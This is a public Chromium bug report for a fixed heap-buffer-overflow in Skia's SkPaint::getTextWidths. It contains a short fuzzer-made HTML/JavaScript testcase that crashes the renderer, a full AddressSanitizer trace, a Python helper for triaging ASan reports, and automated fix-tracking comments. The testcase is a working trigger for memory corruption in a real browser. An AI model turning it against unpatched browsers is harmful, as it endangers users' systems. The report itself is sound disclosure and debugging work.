Issue metadata
Security: heap-buffer-overflow in SkPaint::getTextWidths
Reported by
cloudfuz...@gmail.com,
Aug 5
Issue description
VULNERABILITY DETAILS
The following testcase crashes the latest ASAN build of content_shell
VERSION
Chrome Version: asan-linux-release-580772
Operating System: Linux 64bit
REPRODUCTION CASE
<script>
function start() {
  s0='missspelled';
  s3=s0.repeat(10);
  s6=s3.repeat(7);
  s9=s6.repeat(3);
  s38=s9.repeat(3);
  s39='undefined'+s38;
  s48=unescape('%20%u200F');
  s49=s39.repeat(10);
  s50=s48.concat(undefined,s49);
  s83=s50.concat('undefined');
  s84=s83.repeat(1);
  o761=document.createElementNS('http://www.w3.org/1999/xhtml','li');
  document.documentElement.appendChild(o761);
  o761.after(s84);
}
</script>
<body onload="start()"></body>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:
=================================================================
==32138==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000002f610 at pc 0x000003e8f693 bp 0x7fff56c30cf0 sp 0x7fff56c30ce8
WRITE of size 4 at 0x63000002f610 thread T0 (content_shell)
#0 0x3e8f692 in set third_party/skia/include/core/SkRect.h:1000:17
#1 0x3e8f692 in set_bounds third_party/skia/src/core/SkPaint.cpp:658
#2 0x3e8f692 in SkPaint::getTextWidths(void const*, unsigned long, float*, SkRect*) const third_party/skia/src/core/SkPaint.cpp:912
#3 0x10c89a0f in blink::SkiaTextMetrics::GetSkiaBoundsForGlyphs(WTF::Vector<unsigned short, 0u, WTF::PartitionAllocator>, SkRect*) third_party/blink/renderer/platform/fonts/skia/skia_text_metrics.cc:83:11
#4 0x10c84b36 in blink::SimpleFontData::BoundsForGlyphs(WTF::Vector<unsigned short, 0u, WTF::PartitionAllocator>, WTF::Vector<SkRect, 0u, WTF::PartitionAllocator>*) const third_party/blink/renderer/platform/fonts/simple_font_data.cc:364:28
#5 0x10c6781a in void blink::ShapeResult::ComputeGlyphBounds<true>(blink::ShapeResult::RunInfo const&, WTF::Vector<unsigned short, 0u, WTF::PartitionAllocator> const&) third_party/blink/renderer/platform/fonts/shaping/shape_result.cc:963:21
#6 0x10c54694 in void blink::ShapeResult::ComputeGlyphPositions<true>(blink::ShapeResult::RunInfo*, unsigned int, unsigned int, hb_buffer_t*) third_party/blink/renderer/platform/fonts/shaping/shape_result.cc:928:3
#7 0x10c52ea4 in blink::ShapeResult::InsertRun(std::__1::unique_ptr<blink::ShapeResult::RunInfo, std::__1::default_delete<blink::ShapeResult::RunInfo> >, unsigned int, unsigned int, hb_buffer_t*) third_party/blink/renderer/platform/fonts/shaping/shape_result.cc:989:5
#8 0x10c277ab in blink::HarfBuzzShaper::CommitGlyphs(blink::RangeData*, blink::SimpleFontData const*, UScriptCode, blink::CanvasRotationInVertical, bool, blink::BufferSlice const&, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:345:19
#9 0x10c29394 in blink::HarfBuzzShaper::ExtractShapeResults(blink::RangeData*, bool&, blink::ReshapeQueueItem const&, blink::SimpleFontData const*, UScriptCode, blink::CanvasRotationInVertical, bool, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:476:7
#10 0x10c2ee9f in blink::HarfBuzzShaper::ShapeSegment(blink::RangeData*, blink::RunSegmenter::RunSegmenterRange const&, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:933:5
#11 0x10c3356d in blink::HarfBuzzShaper::Shape(blink::Font const*, blink::TextDirection, unsigned int, unsigned int, blink::RunSegmenter::RunSegmenterRange const*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:986:9
#12 0x10c35d34 in blink::HarfBuzzShaper::Shape(blink::Font const*, blink::TextDirection) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:1011:10
#13 0x10c14ed5 in blink::CachingWordShapeIterator::ShapeWordWithoutSpacing(blink::TextRun const&, blink::Font const*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.cc:21:14
#14 0x10c11afc in blink::CachingWordShapeIterator::ShapeWord(blink::TextRun const&, blink::Font const*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:87:14
#15 0x10c11e57 in blink::CachingWordShapeIterator::ShapeToEndIndex(scoped_refptr<blink::ShapeResult const>*, unsigned int) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:161:17
#16 0x10c0e590 in NextWord third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:94:12
#17 0x10c0e590 in blink::CachingWordShapeIterator::Next(scoped_refptr<blink::ShapeResult const>*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:77
#18 0x10c0e0b6 in blink::CachingWordShaper::Width(blink::TextRun const&, WTF::HashSet<blink::SimpleFontData const*, WTF::PtrHash<blink::SimpleFontData const>, WTF::HashTraits<blink::SimpleFontData const*>, WTF::PartitionAllocator>*, blink::FloatRect*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shaper.cc:49:19
#19 0x10bbfa5b in blink::Font::Width(blink::TextRun const&, WTF::HashSet<blink::SimpleFontData const*, WTF::PtrHash<blink::SimpleFontData const>, WTF::HashTraits<blink::SimpleFontData const*>, WTF::PartitionAllocator>*, blink::FloatRect*) const third_party/blink/renderer/platform/fonts/font.cc:271:17
#20 0x137c049d in TextWidth third_party/blink/renderer/core/layout/line/breaking_context_inline_headers.h:728:15
#21 0x137c049d in blink::BreakingContext::HandleText(WTF::Vector<blink::WordMeasurement, 64u, WTF::PartitionAllocator>&, bool&) third_party/blink/renderer/core/layout/line/breaking_context_inline_headers.h:1267
#22 0x137af48c in blink::LineBreaker::NextLineBreak(blink::BidiResolver<blink::InlineIterator, blink::BidiRun, blink::BidiIsolatedRun>&, blink::LineInfo&, blink::LayoutTextInfo&, WTF::Vector<blink::WordMeasurement, 64u, WTF::PartitionAllocator>&) third_party/blink/renderer/core/layout/line/line_breaker.cc:99:19
#23 0x1339f9fd in blink::LayoutBlockFlow::LayoutRunsAndFloatsInRange(blink::LineLayoutState&, blink::BidiResolver<blink::InlineIterator, blink::BidiRun, blink::BidiIsolatedRun>&, blink::InlineIterator const&, blink::BidiStatus const&) third_party/blink/renderer/core/layout/layout_block_flow_line.cc:1121:22
#24 0x1339bd2b in blink::LayoutBlockFlow::LayoutRunsAndFloats(blink::LineLayoutState&) third_party/blink/renderer/core/layout/layout_block_flow_line.cc:1000:3
#25 0x133b1705 in blink::LayoutBlockFlow::LayoutInlineChildren(bool, blink::LayoutUnit) third_party/blink/renderer/core/layout/layout_block_flow_line.cc:1992:5
#26 0x1333127a in blink::LayoutBlockFlow::LayoutChildren(bool, blink::SubtreeLayoutScope&) third_party/blink/renderer/core/layout/layout_block_flow.cc:598:5
#27 0x1332f524 in blink::LayoutBlockFlow::UpdateBlockLayout(bool) third_party/blink/renderer/core/layout/layout_block_flow.cc:471:5
#28 0x13301f79 in blink::LayoutBlock::UpdateLayout() third_party/blink/renderer/core/layout/layout_block.cc:439:3
#29 0x1333c877 in blink::LayoutBlockFlow::PositionAndLayoutOnceIfNeeded(blink::LayoutBox&, blink::LayoutUnit, blink::BlockChildrenLayoutInfo&) third_party/blink/renderer/core/layout/layout_block_flow.cc:791:11
#30 0x1333d92d in blink::LayoutBlockFlow::LayoutBlockChild(blink::LayoutBox&, blink::BlockChildrenLayoutInfo&) third_party/blink/renderer/core/layout/layout_block_flow.cc:854:7
#31 0x13338be8 in blink::LayoutBlockFlow::LayoutBlockChildren(bool, blink::SubtreeLayoutScope&, blink::LayoutUnit, blink::LayoutUnit) third_party/blink/renderer/core/layout/layout_block_flow.cc:1559:5
#32 0x1333125e in blink::LayoutBlockFlow::LayoutChildren(bool, blink::SubtreeLayoutScope&) third_party/blink/renderer/core/layout/layout_block_flow.cc:600:5
#33 0x1332f524 in blink::LayoutBlockFlow::UpdateBlockLayout(bool) third_party/blink/renderer/core/layout/layout_block_flow.cc:471:5
#34 0x13301f79 in blink::LayoutBlock::UpdateLayout() third_party/blink/renderer/core/layout/layout_block.cc:439:3
#35 0x1333c877 in blink::LayoutBlockFlow::PositionAndLayoutOnceIfNeeded(blink::LayoutBox&, blink::LayoutUnit, blink::BlockChildrenLayoutInfo&) third_party/blink/renderer/core/layout/layout_block_flow.cc:791:11
#36 0x1333d92d in blink::LayoutBlockFlow::LayoutBlockChild(blink::LayoutBox&, blink::BlockChildrenLayoutInfo&) third_party/blink/renderer/core/layout/layout_block_flow.cc:854:7
#37 0x13338be8 in blink::LayoutBlockFlow::LayoutBlockChildren(bool, blink::SubtreeLayoutScope&, blink::LayoutUnit, blink::LayoutUnit) third_party/blink/renderer/core/layout/layout_block_flow.cc:1559:5
#38 0x1333125e in blink::LayoutBlockFlow::LayoutChildren(bool, blink::SubtreeLayoutScope&) third_party/blink/renderer/core/layout/layout_block_flow.cc:600:5
#39 0x1332f524 in blink::LayoutBlockFlow::UpdateBlockLayout(bool) third_party/blink/renderer/core/layout/layout_block_flow.cc:471:5
#40 0x13746199 in blink::LayoutView::UpdateBlockLayout(bool) third_party/blink/renderer/core/layout/layout_view.cc:312:20
#41 0x13301f79 in blink::LayoutBlock::UpdateLayout() third_party/blink/renderer/core/layout/layout_block.cc:439:3
#42 0x137472b7 in blink::LayoutView::UpdateLayout() third_party/blink/renderer/core/layout/layout_view.cc:355:20
#43 0x125a035a in blink::LocalFrameView::PerformLayout(bool) third_party/blink/renderer/core/frame/local_frame_view.cc:769:24
#44 0x1259b623 in blink::LocalFrameView::UpdateLayout() third_party/blink/renderer/core/frame/local_frame_view.cc:931:7
#45 0x11bb0bae in blink::Document::ImplicitClose() third_party/blink/renderer/core/dom/document.cc:3357:15
#46 0x11bb1a9c in blink::Document::CheckCompletedInternal() third_party/blink/renderer/core/dom/document.cc:3423:5
#47 0x11bb046c in blink::Document::CheckCompleted() third_party/blink/renderer/core/dom/document.cc:3399:7
#48 0x13ad8232 in blink::FrameLoader::FinishedParsing() third_party/blink/renderer/core/loader/frame_loader.cc:417:26
#49 0x11bda58e in blink::Document::FinishedParsing() third_party/blink/renderer/core/dom/document.cc:5905:21
#50 0x12cbad23 in end third_party/blink/renderer/core/html/parser/html_document_parser.cc:890:18
#51 0x12cbad23 in blink::HTMLDocumentParser::AttemptToRunDeferredScriptsAndEnd() third_party/blink/renderer/core/html/parser/html_document_parser.cc:905
#52 0x12cc1bca in blink::HTMLDocumentParser::ProcessTokenizedChunkFromBackgroundParser(std::__1::unique_ptr<blink::HTMLDocumentParser::TokenizedChunk, std::__1::default_delete<blink::HTMLDocumentParser::TokenizedChunk> >) third_party/blink/renderer/core/html/parser/html_document_parser.cc
#53 0x12cbc851 in blink::HTMLDocumentParser::PumpPendingSpeculations() third_party/blink/renderer/core/html/parser/html_document_parser.cc:591:9
#54 0x10f2e4a3 in Run base/callback.h:99:12
#55 0x10f2e4a3 in blink::TaskHandle::Runner::Run(blink::TaskHandle const&) third_party/blink/renderer/platform/web_task_runner.cc:55
#56 0xacc112c in Run base/callback.h:99:12
#57 0xacc112c in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
#58 0xada7245 in base::sequence_manager::internal::ThreadControllerImpl::DoWork(base::sequence_manager::internal::ThreadControllerImpl::WorkType) base/task/sequence_manager/thread_controller_impl.cc:169:21
#59 0xacc112c in Run base/callback.h:99:12
#60 0xacc112c in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
#61 0xacbb704 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:431:46
#62 0xacbcbbc in DeferOrRunPendingTask base/message_loop/message_loop.cc:442:5
#63 0xacbcbbc in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:514
#64 0xacc584f in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31
#65 0xad3383b in base::RunLoop::Run() base/run_loop.cc:102:14
#66 0x17d26b8a in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:200:23
#67 0x8661c53 in content::RunZygote(content::ContentMainDelegate*) content/app/content_main_runner_impl.cc:493:14
#68 0x86657f9 in content::ContentMainRunnerImpl::Run(bool) content/app/content_main_runner_impl.cc:891:10
#69 0xfed3e59 in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:472:29
#70 0x5e85ace in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10
#71 0x356e6f7 in main content/shell/app/shell_main.cc:39:10
#72 0x7f56eff002e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
0x63000002f610 is located 0 bytes to the right of 61968-byte region [0x630000020400,0x63000002f610)
allocated by thread T0 (content_shell) here:
#0 0x353ed53 in __interceptor_malloc /b/swarming/w/ir/kitchen-workdir/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
#1 0xff69fe2 in PartitionAllocGenericFlags base/allocator/partition_allocator/partition_alloc.h:348:18
#2 0xff69fe2 in Alloc base/allocator/partition_allocator/partition_alloc.h:368
#3 0xff69fe2 in BufferMalloc third_party/blink/renderer/platform/wtf/allocator/partitions.h:97
#4 0xff69fe2 in WTF::PartitionAllocator::AllocateBacking(unsigned long, char const*) third_party/blink/renderer/platform/wtf/allocator/partition_allocator.cc:13
#5 0x10c67717 in AllocateVectorBacking<SkRect> third_party/blink/renderer/platform/wtf/allocator/partition_allocator.h:43:9
#6 0x10c67717 in AllocateBuffer third_party/blink/renderer/platform/wtf/vector.h:402
#7 0x10c67717 in VectorBuffer third_party/blink/renderer/platform/wtf/vector.h:500
#8 0x10c67717 in Vector third_party/blink/renderer/platform/wtf/vector.h:1345
#9 0x10c67717 in void blink::ShapeResult::ComputeGlyphBounds<true>(blink::ShapeResult::RunInfo const&, WTF::Vector<unsigned short, 0u, WTF::PartitionAllocator> const&) third_party/blink/renderer/platform/fonts/shaping/shape_result.cc:962
#10 0x10c54694 in void blink::ShapeResult::ComputeGlyphPositions<true>(blink::ShapeResult::RunInfo*, unsigned int, unsigned int, hb_buffer_t*) third_party/blink/renderer/platform/fonts/shaping/shape_result.cc:928:3
#11 0x10c52ea4 in blink::ShapeResult::InsertRun(std::__1::unique_ptr<blink::ShapeResult::RunInfo, std::__1::default_delete<blink::ShapeResult::RunInfo> >, unsigned int, unsigned int, hb_buffer_t*) third_party/blink/renderer/platform/fonts/shaping/shape_result.cc:989:5
#12 0x10c277ab in blink::HarfBuzzShaper::CommitGlyphs(blink::RangeData*, blink::SimpleFontData const*, UScriptCode, blink::CanvasRotationInVertical, bool, blink::BufferSlice const&, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:345:19
#13 0x10c29394 in blink::HarfBuzzShaper::ExtractShapeResults(blink::RangeData*, bool&, blink::ReshapeQueueItem const&, blink::SimpleFontData const*, UScriptCode, blink::CanvasRotationInVertical, bool, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:476:7
#14 0x10c2ee9f in blink::HarfBuzzShaper::ShapeSegment(blink::RangeData*, blink::RunSegmenter::RunSegmenterRange const&, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:933:5
#15 0x10c3356d in blink::HarfBuzzShaper::Shape(blink::Font const*, blink::TextDirection, unsigned int, unsigned int, blink::RunSegmenter::RunSegmenterRange const*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:986:9
#16 0x10c35d34 in blink::HarfBuzzShaper::Shape(blink::Font const*, blink::TextDirection) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:1011:10
#17 0x10c14ed5 in blink::CachingWordShapeIterator::ShapeWordWithoutSpacing(blink::TextRun const&, blink::Font const*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.cc:21:14
#18 0x10c11afc in blink::CachingWordShapeIterator::ShapeWord(blink::TextRun const&, blink::Font const*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:87:14
#19 0x10c11e57 in blink::CachingWordShapeIterator::ShapeToEndIndex(scoped_refptr<blink::ShapeResult const>*, unsigned int) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:161:17
#20 0x10c0e590 in NextWord third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:94:12
#21 0x10c0e590 in blink::CachingWordShapeIterator::Next(scoped_refptr<blink::ShapeResult const>*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:77
#22 0x10c0e0b6 in blink::CachingWordShaper::Width(blink::TextRun const&, WTF::HashSet<blink::SimpleFontData const*, WTF::PtrHash<blink::SimpleFontData const>, WTF::HashTraits<blink::SimpleFontData const*>, WTF::PartitionAllocator>*, blink::FloatRect*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shaper.cc:49:19
#23 0x10bbfa5b in blink::Font::Width(blink::TextRun const&, WTF::HashSet<blink::SimpleFontData const*, WTF::PtrHash<blink::SimpleFontData const>, WTF::HashTraits<blink::SimpleFontData const*>, WTF::PartitionAllocator>*, blink::FloatRect*) const third_party/blink/renderer/platform/fonts/font.cc:271:17
#24 0x137c049d in TextWidth third_party/blink/renderer/core/layout/line/breaking_context_inline_headers.h:728:15
#25 0x137c049d in blink::BreakingContext::HandleText(WTF::Vector<blink::WordMeasurement, 64u, WTF::PartitionAllocator>&, bool&) third_party/blink/renderer/core/layout/line/breaking_context_inline_headers.h:1267
#26 0x137af48c in blink::LineBreaker::NextLineBreak(blink::BidiResolver<blink::InlineIterator, blink::BidiRun, blink::BidiIsolatedRun>&, blink::LineInfo&, blink::LayoutTextInfo&, WTF::Vector<blink::WordMeasurement, 64u, WTF::PartitionAllocator>&) third_party/blink/renderer/core/layout/line/line_breaker.cc:99:19
#27 0x1339f9fd in blink::LayoutBlockFlow::LayoutRunsAndFloatsInRange(blink::LineLayoutState&, blink::BidiResolver<blink::InlineIterator, blink::BidiRun, blink::BidiIsolatedRun>&, blink::InlineIterator const&, blink::BidiStatus const&) third_party/blink/renderer/core/layout/layout_block_flow_line.cc:1121:22
#28 0x1339bd2b in blink::LayoutBlockFlow::LayoutRunsAndFloats(blink::LineLayoutState&) third_party/blink/renderer/core/layout/layout_block_flow_line.cc:1000:3
#29 0x133b1705 in blink::LayoutBlockFlow::LayoutInlineChildren(bool, blink::LayoutUnit) third_party/blink/renderer/core/layout/layout_block_flow_line.cc:1992:5
#30 0x1333127a in blink::LayoutBlockFlow::LayoutChildren(bool, blink::SubtreeLayoutScope&) third_party/blink/renderer/core/layout/layout_block_flow.cc:598:5
#31 0x1332f524 in blink::LayoutBlockFlow::UpdateBlockLayout(bool) third_party/blink/renderer/core/layout/layout_block_flow.cc:471:5
#32 0x13301f79 in blink::LayoutBlock::UpdateLayout() third_party/blink/renderer/core/layout/layout_block.cc:439:3
#33 0x1333c877 in blink::LayoutBlockFlow::PositionAndLayoutOnceIfNeeded(blink::LayoutBox&, blink::LayoutUnit, blink::BlockChildrenLayoutInfo&) third_party/blink/renderer/core/layout/layout_block_flow.cc:791:11
#34 0x1333d92d in blink::LayoutBlockFlow::LayoutBlockChild(blink::LayoutBox&, blink::BlockChildrenLayoutInfo&) third_party/blink/renderer/core/layout/layout_block_flow.cc:854:7
#35 0x13338be8 in blink::LayoutBlockFlow::LayoutBlockChildren(bool, blink::SubtreeLayoutScope&, blink::LayoutUnit, blink::LayoutUnit) third_party/blink/renderer/core/layout/layout_block_flow.cc:1559:5
#36 0x1333125e in blink::LayoutBlockFlow::LayoutChildren(bool, blink::SubtreeLayoutScope&) third_party/blink/renderer/core/layout/layout_block_flow.cc:600:5
#37 0x1332f524 in blink::LayoutBlockFlow::UpdateBlockLayout(bool) third_party/blink/renderer/core/layout/layout_block_flow.cc:471:5
#38 0x13301f79 in blink::LayoutBlock::UpdateLayout() third_party/blink/renderer/core/layout/layout_block.cc:439:3
SUMMARY: AddressSanitizer: heap-buffer-overflow third_party/skia/include/core/SkRect.h:1000:17 in set
Shadow bytes around the buggy address:
0x0c607fffde70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c607fffde80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c607fffde90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c607fffdea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c607fffdeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c607fffdec0: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fffded0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fffdee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fffdef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fffdf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fffdf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==32138==ABORTING
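Added triage helper, not part of this issue, of Chromium or of Skia: it parses the access line and the region line of the ASan report above and relates the faulting address to an array of fixed-size elements, so the "0 bytes to the right of 61968-byte region" line becomes "one element past the end of a 3873-element array". The 16-byte element size is sizeof(SkRect) (four floats), which matches the AllocateVectorBacking<SkRect> frame in the allocation stack and the 4-byte write inside SkRect::set; the report excerpt is constructed from the lines quoted in this issue.

```python
import re
from dataclasses import dataclass

# Constructed excerpt of the ASan report quoted in this issue: the lines that
# carry the numbers a triager needs (access, allocation frame, region).
SAMPLE_REPORT = """\
==32138==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000002f610 at pc 0x000003e8f693 bp 0x7fff56c30cf0 sp 0x7fff56c30ce8
WRITE of size 4 at 0x63000002f610 thread T0 (content_shell)
    #5 0x10c67717 in AllocateVectorBacking<SkRect> third_party/blink/renderer/platform/wtf/allocator/partition_allocator.h:43:9
0x63000002f610 is located 0 bytes to the right of 61968-byte region [0x630000020400,0x63000002f610)
"""

SIZEOF_SKRECT = 16  # four 32-bit floats: fLeft, fTop, fRight, fBottom
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at (0x[0-9a-f]+)", re.M)
REGION_RE = re.compile(
    r"(0x[0-9a-f]+) is located (\d+) bytes to the (left|right) of "
    r"(\d+)-byte region \[(0x[0-9a-f]+),(0x[0-9a-f]+)\)"
)

@dataclass
class OverflowTriage:
    access: str             # READ or WRITE
    access_size: int        # bytes touched by the faulting instruction
    region_size: int        # bytes in the allocation ASan matched the address to
    element_count: int      # region_size // element_size
    element_index: int      # element the faulting address falls in (0-based, may be negative)
    byte_in_element: int    # offset of the access inside that element
    elements_past_end: int  # 0 if inside the region; 1 means exactly one element past the end
    partial_element: bool   # region size is not a whole number of elements

def triage_asan_overflow(report: str, element_size: int) -> OverflowTriage:
    """Relate an ASan heap-buffer-overflow to an array of element_size-byte elements."""
    access = ACCESS_RE.search(report)
    region = REGION_RE.search(report)
    if access is None or region is None:
        raise ValueError("report lacks the access line or the region line")
    kind, size = access.group(1), int(access.group(2))
    addr = int(access.group(3), 16)
    distance, side = int(region.group(2)), region.group(3)
    region_size = int(region.group(4))
    start, end = int(region.group(5), 16), int(region.group(6), 16)
    if end - start != region_size:
        raise ValueError("region bounds disagree with the stated region size")
    expected = addr - end if side == "right" else start - addr
    if expected != distance:
        raise ValueError("stated distance does not match the addresses (mangled paste?)")
    offset = addr - start                       # negative for an underflow
    count, remainder = divmod(region_size, element_size)
    index, byte_in = divmod(offset, element_size)
    past_end = index - count + 1 if index >= count else 0
    return OverflowTriage(kind, size, region_size, count, index, byte_in,
                          past_end, remainder != 0)

def summarize(t: OverflowTriage, element_name: str) -> str:
    """One-line summary suitable for a bug comment."""
    where = (f"{t.elements_past_end} {element_name}(s) past the end"
             if t.elements_past_end else f"inside element {t.element_index}")
    return (f"{t.access} of {t.access_size} bytes, {where} of a "
            f"{t.element_count}-element {element_name} array "
            f"({t.region_size} bytes), byte {t.byte_in_element} of that element")

if __name__ == "__main__":
    print(summarize(triage_asan_overflow(SAMPLE_REPORT, SIZEOF_SKRECT), "SkRect"))
```

A whole-element count with byte offset 0 and exactly one element past the end is the signature of a glyph-count mismatch between the caller that sized the Vector<SkRect> and the callee that filled it, rather than a corrupted pointer or a wild index.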
Aug 6
Aug 7
Still waiting for the regression range to identify the culprit CL and an owner.
Aug 7
Detailed report: https://clusterfuzz.com/testcase?key=6577431109173248
Job Type: linux_asan_content_shell
Platform Id: linux
Crash Type: Heap-buffer-overflow WRITE 4
Crash Address: 0x63000002f4f0
Crash State:
SkPaint::getTextWidths
void blink::ShapeResult::ComputeGlyphPositions<true>
blink::ShapeResult::InsertRun
Sanitizer: address (ASAN)
Recommended Security Severity: High
Regressed: https://clusterfuzz.com/revisions?job=linux_asan_content_shell&range=579681:579682
Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=6577431109173248
See https://github.com/google/clusterfuzz-tools for more information.
Aug 7
This is a serious security regression. If you are not able to fix this quickly, please revert the change that introduced it. If this doesn't affect a release branch, or has not been properly classified for severity, please update the Security_Impact or Security_Severity labels, and remove the ReleaseBlock label. To disable this altogether, apply ReleaseBlock-NA. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Aug 7
Aug 7
Oh wait, that's a duplicate of issue 870178.
Aug 10
ClusterFuzz has detected this issue as fixed in range 581423:581427.
Detailed report: https://clusterfuzz.com/testcase?key=6577431109173248
Job Type: linux_asan_content_shell
Platform Id: linux
Crash Type: Heap-buffer-overflow WRITE 4
Crash Address: 0x63000002f4f0
Crash State:
SkPaint::getTextWidths
void blink::ShapeResult::ComputeGlyphPositions<true>
blink::ShapeResult::InsertRun
Sanitizer: address (ASAN)
Recommended Security Severity: High
Regressed: https://clusterfuzz.com/revisions?job=linux_asan_content_shell&range=579681:579682
Fixed: https://clusterfuzz.com/revisions?job=linux_asan_content_shell&range=581423:581427
Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=6577431109173248
See https://github.com/google/clusterfuzz-tools for more information.
If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
Nov 15
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot